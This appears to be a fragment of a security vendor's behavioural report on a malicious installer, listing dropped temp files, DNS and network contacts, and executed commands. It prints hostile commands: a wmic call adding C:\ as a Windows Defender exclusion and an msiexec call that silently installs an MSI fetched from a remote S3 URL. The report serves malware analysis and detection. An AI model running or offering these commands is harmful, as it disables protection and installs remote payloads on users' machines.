Technical Information
- %TEMP%\mw-5a504534-c929-4e4b-a2a7-f00953ebc166\msiwrapper.ini
- %TEMP%\mw-5a504534-c929-4e4b-a2a7-f00953ebc166\files.cab
- %TEMP%\mw-5a504534-c929-4e4b-a2a7-f00953ebc166\files\$dpx$.tmp\635d40d88617d04c95a2a487f5353cf2.tmp
- from %TEMP%\mw-5a504534-c929-4e4b-a2a7-f00953ebc166\files\$dpx$.tmp\635d40d88617d04c95a2a487f5353cf2.tmp to %TEMP%\mw-5a504534-c929-4e4b-a2a7-f00953ebc166\files\xxx.exe
- 'sy######.#3.eu-west-2.amazonaws.com':443
- DNS ASK sy######.#3.eu-west-2.amazonaws.com
- '%TEMP%\mw-5a504534-c929-4e4b-a2a7-f00953ebc166\files\xxx.exe'
- '%WINDIR%\syswow64\expand.exe' -R files.cab -F:* files (with hidden window)
- '<SYSTEM32>\wbem\wmic.exe' /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath=C:\ (with hidden window)
- '<SYSTEM32>\wbem\wmic.exe' /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath=C:\
- '<SYSTEM32>\msiexec.exe' /i https://syshelor.s3.eu-west-2.amazonaws.com/sHelpe.msi /qn
- '%WINDIR%\syswow64\expand.exe' -R files.cab -F:* files